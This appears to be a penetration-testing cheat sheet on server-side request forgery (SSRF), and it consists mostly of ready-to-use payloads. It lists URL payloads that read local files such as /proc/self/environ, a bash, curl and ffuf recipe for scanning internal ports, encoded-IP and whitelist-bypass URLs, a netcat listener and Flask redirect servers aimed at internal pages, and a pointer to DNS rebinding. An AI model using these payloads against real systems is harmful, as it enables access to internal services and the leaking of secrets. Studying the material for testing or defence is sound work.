SSRF

Server-Side Request Forgery.

It occurs when an application accepts input from the user (URL, GET, POST, HEADER, PARAMETER, etc.), which is not properly verified, to make HTTP requests to another internal or external resource.

Types: In-Band and Blind.

Payload

URL validation bypass

Remote files

http://<TARGET>/load?q=http://<IP>:<PORT>

Local files

http://<TARGET>/load?q=file://<ABSOLUTE_PATH>
http://<TARGET>/load?q=file:///proc/self/environ  # environment variables, like pwd

Port Scanning

for port in {1..65535};do echo $port >> ports.txt; done

curl -i -s "http://<TARGET_IP>/load?q=http://127.0.0.1:1”
# recovery length closed door

ffuf -w ./ports.txt:PORT -u "http://<TARGET_IP>/load?q=http://127.0.0.1:PORT" -fs 30

Encoding IP

Abbreviations	127.1
Decimal	2130706433
Octal	0177.0000.0000.0001 (017700000001)

http://127.0.0.1#@whitelist.net
http://127.0.0.1%23@whitelist.net
http://127.0.0.1%2523@whitelist.net
http://whitelist.net#@127.0.0.1
http://whitelist.net%23@127.0.0.1
http://whitelist.net%2523@127.0.0.1

HTTP Redirection

Server Redirection

echo -e "HTTP/1.1 302 Found\nLocation: <TARGET_SITE>\n" | nc -lnvp 80

from flask import Flask, redirect

app = Flask(__name__)

@app.route('/')
def redirect_to_new_page():
    return redirect('<TARGET_SITE>', code=302)

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

from flask import Flask, redirect, make_response

app = Flask(__name__)

@app.route('/')
def index():
    # Create a response with a redirect and set the desired content type.
    response = make_response(redirect('http://0.0.0.0/internal.php'))
    response.headers['Content-Type'] = 'image/png'
    return response

if __name__ == '__main__':
    app.run(debug=True)

DNS Rebinding

Set up a DNS server that performs constant switching between two IPs. Use Rebinder, set up the two ip's for continuous switching, get the domain to use.

Inconsistencies on URL Parser

A New Era of SSRF - Black Hat USA 2017